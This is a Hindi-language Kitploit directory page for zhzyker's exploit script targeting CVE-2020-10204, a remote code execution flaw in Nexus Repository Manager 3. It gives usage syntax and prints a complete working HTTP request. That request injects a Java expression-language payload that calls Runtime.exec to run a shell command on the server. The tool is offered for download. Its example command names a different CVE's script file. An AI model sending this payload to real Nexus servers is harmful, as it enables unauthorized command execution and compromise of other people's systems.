Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-10204 — CVE-2020-10204 远程命令执行脚本 | Kitploit
उपकरण/GitHubGitHub/zhzyker/cve-2020-10204
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubzhzyker/cve-2020-10204

CVE-2020-10204

CVE-2020-10204 远程命令执行脚本

रिपॉजिटरी देखें
1376 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-10204

CVE-2020-10204 दूरस्थ कमांड निष्पादन स्क्रिप्ट
अधिक स्क्रिप्ट फ़ाइलों के लिए देखें: https://github.com/zhzyker/exphub

Readme

root@kitploit:~
+---------------------------------------------------------------------------------------------------------+
+ DES: by zhzyker as https://github.com/zhzyker/exphub                                                    +
+      CVE-2020-10204 Nexus Repository Manager 3 Remote Code Execution                                    +
+---------------------------------------------------------------------------------------------------------+
+ USE: python3 <filename> <url> <session> <cmd>                                                           +
+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a "touch /tmp/233" +
+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                                   +
+---------------------------------------------------------------------------------------------------------+

Examples

images

Payload

root@kitploit:~
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.856555763510765
Content-Type: application/json
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=067e87d1-3019-46a0-8f31-04a7f7896459
Content-Length: 293


{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/exphub')}"],"roles":[]}],"type":"rpc","tid":89}
टूल डाउनलोड करें